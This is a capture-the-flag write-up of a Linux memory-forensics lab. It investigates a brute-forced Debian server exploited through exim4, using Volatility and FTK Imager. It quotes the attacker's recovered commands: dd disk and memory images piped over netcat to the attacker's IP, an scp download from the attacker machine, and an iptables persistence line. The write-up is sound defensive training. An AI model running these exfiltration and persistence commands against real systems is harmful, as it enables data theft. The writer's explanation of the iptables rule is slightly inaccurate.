Ulysses Lab

CyberDefenders Memory Forensic Lab

Scenario

A research server was flagged for suspicious activity after multiple failed authentication attempts. Analysts detected a brute-force attack, unauthorized outbound connections, and possible persistence mechanisms. Using Volatility, a custom Debian5_26 profile was loaded to analyze memory dumps and identify malicious processes. Your task is to investigate forensic artifacts, determine the attacker’s entry point, and uncover any deployed payloads.

Question 1

The attacker was performing a Brute Force attack. What account triggered the alert?

Answer 1

After loading victoria-v8.sda1.img into FTK Imager I went looking for log files. Finding them in /var/log/auth.log. This gave me a few user names, one of which being an invalid user going by the name of ‘ulysses’. Which had several failed password attempts.

Question 2

During investigating the logs. How many failed login attempts were alerted by the same user?

Answer 2

CRTL+F was my best friend here, in the same window I looked for each failed attempt and just counted them all, totaling 32.

Press enter or click to view image in full size

Question 3

What kind of system runs on the targeted server?

Answer 3

After a bit of research, there could be 2 places in which the OS information could be stored in a Linux file system. Firstly in etc/os-release/, for newer systems, secondly in etc/issue. I found the answer in the issue file.

Debian GNU/Linux 5.0

Question 4

What is the victim’s IP address?

Answer 4

I needed to look for network logs, which in Linux is in the syslog files. /var/log/syslog. Leading me to finding the IP address of the machine: 192.168.56.102.

Press enter or click to view image in full size

Question 5

What are the attacker’s two IP addresses?

Answer 5

Searching through the various log files I stumbled across mainlog. Which showed the attackers IP addresses they were utilizing, and trying to get a reverse shell. 192.168.56.101 and 192.168.56.1.

Press enter or click to view image in full size

Question 6

What is the nc service PID number that was running on the server?

Answer 6

This took quite a bit of time to work out. Using the plugin provided I managed to get volatility2 working. However, you have to use the following syntax to get commands working:

python2 vol.py --profile=LinuxDebian5_26x86 -f [MEMDUMP] linux_[COMMAND]

Now I was able to look up the processes and services asked in the question.

┌──(zero㉿kali)-[~/Documents/volatility-master]
└─$ python2 vol.py --profile=LinuxDebian5_26x86 -f dump/memdump.img linux_psxview | grep nc
Volatility Foundation Volatility Framework 2.6
0x0f43e8c0 nc                     2169 True   True   False    True       False   False  
0x0f46c100 nc                     2161 False  True   False    False      False   False 

This gave me 2 different PID numbers, the first one being the correct one. Running the command without grep you are able to see the first column gives a true or false depending on if the service is in the pslist.

Question 7

What service was exploited to gain access to the system?

Answer 7

I needed a little hint for this task. After a little research, hunting for various bash commands would be a good start. So using the following:

python2 vol.py --profile=LinuxDebian5_26x86 -f dump/memdump.img linux_bash  

I was able to find that there were a ton of mentions to a service called, exim4. Specifically removing any traces of the current installation, then grabbing and installing a specific version from their own machine.

Question 8

What is the CVE number of exploited vulnerability?

Answer 9

Looking through exploit-db for exim4, there was a single result. A Heap Buffer Overflow vulnerability that specifically targeted versions 4.69 and older, which I know was the version the attacker had gotten from their own machine.

2011-02-06 14:04:39 UTC+0000   mkdir exim4
2011-02-06 14:04:39 UTC+0000   dpkg -i exim4-config_4.69-9_all.deb 
2011-02-06 14:04:39 UTC+0000   cd exim4/
2011-02-06 14:04:39 UTC+0000   scp yom@192.168.56.1:/home/yom/temporary/exmi4/* .
2011-02-06 14:04:39 UTC+0000   dpkg -i exim4-base_4.69-9_i386.deb

Press enter or click to view image in full size

Question 9

During this attack, the attacker downloaded two files to the server. Provide the name of the compressed file.

Answer 9

Temporary folders are a good place to start, most of the time just called /tmp/. From previous answers I saw that the attacker had already been doing so, which promoted me to look through the file system using the following command:

└─$ python2 vol.py --profile=LinuxDebian5_26x86 -f dump/memdump.img linux_enumerate_files | grep tmp
Volatility Foundation Volatility Framework 2.6
   0xcf10b4ac                     36405 /tmp
   0xcf1e2e48                     39467 /tmp/rk.tar
          0x0 ------------------------- /tmp/e.conf
          0x0 ------------------------- /tmp/ccYTefv5.le
          0x0 ------------------------- /tmp/ccCGQiJB.ld
          0x0 ------------------------- /tmp/ccEpMUR7.o
          0x0 ------------------------- /tmp/ccm0efZD.c
          0x0 ------------------------- /tmp/ccOctbQn.o
          0x0 ------------------------- /tmp/ccxikrda.s
   0xcf16a698                     39466 /tmp/c.pl

I can see 2 files here. rk.tar and c.pl. The answer being rk.tar, as the .tar file is a compressed version.

Question 10

During the investigation, two ports were involved in the process of data exfiltration. Which port did the nc command used for the exfiltration?

Answer 10

Using the bash commands search again, I was able to find the following:

└─$ python2 vol.py --profile=LinuxDebian5_26x86 -f dump/memdump.img linux_bash | grep nc
Volatility Foundation Volatility Framework 2.6
    2042 bash                 2011-02-06 14:04:39 UTC+0000   sudo dd if=/dev/sda | nc 192.168.56.1 4444
    2042 bash                 2011-02-06 14:04:39 UTC+0000   dd if=/dev/sda | nc 192.168.56.1 4444
    2042 bash                 2011-02-06 14:04:39 UTC+0000   dd if=/dev/sda1 | nc 192.168.56.1 4444
    2042 bash                 2011-02-06 14:24:43 UTC+0000   dd if=/dev/sda1 | nc 192.168.56.1 8888
    2042 bash                 2011-02-06 14:42:29 UTC+0000   memdump | nc 192.168.56.1 8888

The latest port being 8888.

Question 11

Which port did the attacker try to block on the firewall?

Answer 11

After finding the rk.tar and c.pl files within the file system on FTK Imager. I quick view inside the rk.tar file there is an install.sh script. Which references port 45295.

The file attempts to modify system files and set up persistence.

echo "/usr/sbin/iptables -I OUTPUT 1 -p tcp --dport 45295 -j DROP" >> /etc/init.d/boot.local

Reading more into how this command works, I found that is modifies the iptables file, the Linux firewall rule utility, and adds a few lines. OUTPUT 1, means it will be top of the list, giving it priority, -j DROP, means it will drop packets coming from that port.

This was a rather challenging box. I had to look up various ways to use the provided profile within Volatility2. I have discovered Volatility3 is just so much easier to work with. Enjoyable challenge, a little head scratching but I feel like I learned a lot.